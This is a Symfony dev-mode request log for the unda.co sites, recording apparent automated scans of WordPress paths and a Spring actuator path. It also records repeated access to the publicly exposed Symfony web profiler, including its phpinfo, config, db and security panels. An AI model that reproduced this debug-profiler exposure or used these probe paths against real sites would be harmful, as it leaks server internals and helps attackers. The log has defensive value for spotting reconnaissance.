[2025-12-20 11:45:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:45:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:45:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:45:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/widgets" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/widgets\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:45:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:45:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/languages" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/languages\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:45:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:45:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/2025" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/2025\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:46:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:46:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:46:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:46:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:46:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/blocks/code" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/blocks/code\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:46:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:46:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:46:55] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
[2025-12-20 11:46:58] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://www.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 11:47:20] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-20 11:47:21] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-20 11:47:21] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-20 11:47:22] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-20 11:47:22] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-20 11:47:23] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-20 11:49:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27c2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27c2a?panel=time","method":"GET"} []
[2025-12-20 11:49:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 11:55:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"223e5d","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/223e5d?panel=cache","method":"GET"} []
[2025-12-20 11:55:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 11:58:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=time","method":"GET"} []
[2025-12-20 11:58:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 11:58:24] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 11:58:30] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 11:59:33] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 11:59:37] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 12:02:47] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 12:03:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=events","method":"GET"} []
[2025-12-20 12:03:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-20 12:06:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=dump","method":"GET"} []
[2025-12-20 12:06:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-20 12:08:04] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 12:08:06] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 12:08:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00ba25","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/00ba25?panel=request","method":"GET"} []
[2025-12-20 12:08:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-20 12:09:11] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 12:09:14] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 12:09:43] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-20 12:09:46] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 12:19:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"223e5d","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/223e5d?panel=config","method":"GET"} []
[2025-12-20 12:19:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 12:22:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=validator","method":"GET"} []
[2025-12-20 12:22:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-20 12:28:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/gateway/routes"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/gateway/routes\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 12:30:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"223e5d","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/223e5d?panel=time","method":"GET"} []
[2025-12-20 12:30:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 12:30:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"819624","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/819624?panel=dump","method":"GET"} []
[2025-12-20 12:30:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-20 12:30:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c78c5b","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c78c5b?panel=security","method":"GET"} []
[2025-12-20 12:30:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-20 12:33:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=swiftmailer","method":"GET"} []
[2025-12-20 12:33:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-20 12:35:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"479de6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/479de6?panel=db","method":"GET"} []
[2025-12-20 12:35:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 12:35:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0314c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a0314c","method":"GET"} []
[2025-12-20 12:35:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 12:36:02] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 12:36:08] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 12:36:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=security","method":"GET"} []
[2025-12-20 12:36:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-20 12:36:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"418d56","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/418d56?panel=events","method":"GET"} []
[2025-12-20 12:36:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-20 12:37:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 12:40:06] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-20 12:40:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"223e5d","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/223e5d?panel=request","method":"GET"} []
[2025-12-20 12:40:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-20 12:41:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=exception","method":"GET"} []
[2025-12-20 12:41:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-20 12:42:56] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"36d0fa","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/36d0fa/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-20 12:42:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-20 12:43:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1d9ab8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1d9ab8?panel=dump","method":"GET"} []
[2025-12-20 12:43:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-20 12:48:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"63017c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/63017c?panel=form","method":"GET"} []
[2025-12-20 12:48:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-20 12:49:02] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"35eea5","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/35eea5/search/results?ip=189.172.83.228&limit=10&method=GET","method":"GET"} []
[2025-12-20 12:49:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.83.228&limit=10&method=GET","method":"GET"} []
